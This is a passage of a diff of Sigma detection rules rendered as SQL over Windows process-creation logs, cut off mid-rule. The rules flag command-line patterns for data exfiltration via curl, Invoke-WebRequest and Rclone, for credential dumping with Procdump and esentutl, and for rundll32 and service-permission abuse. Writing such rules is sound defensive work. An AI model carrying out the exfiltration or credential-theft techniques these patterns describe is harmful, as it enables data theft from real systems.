- "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "status": "experimental", + "description": "Detects usage of the SysInternals Procdump utility", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" - }, - { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", - "tags": [ - "attack.discovery", - "attack.t1482" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate use of procdump by a developer or administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Legitimate administrative tasks" + "Legitimate usage of the utility by administrators to query the event log" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.lateral_movement" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of dsacls to bind to an LDAP session" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "False positives are expected (e.g. in environments where WinRM is used legitimately)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((SubjectLogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (SubjectLogonId = '')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_pua_advanced_port_scanner.yml" }, { - "title": "Rundll32 InstallScreenSaver Execution", - "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "status": "experimental", - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "title": "Esentutl Gather Credentials", + "id": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "status": "test", + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "author": "sam0x90", "tags": [ - "attack.t1218.011", - "attack.defense_evasion" + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate installation of a new screensaver" + "To be determined" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%esentutl%' ESCAPE '\\' AND CommandLine LIKE '% /p%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" + "filename": "proc_creation_win_esentutl_params.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", - "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", - "author": "frack113", + "title": "PUA - CleanWipe Execution", + "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "status": "experimental", + "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrative use (Should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' 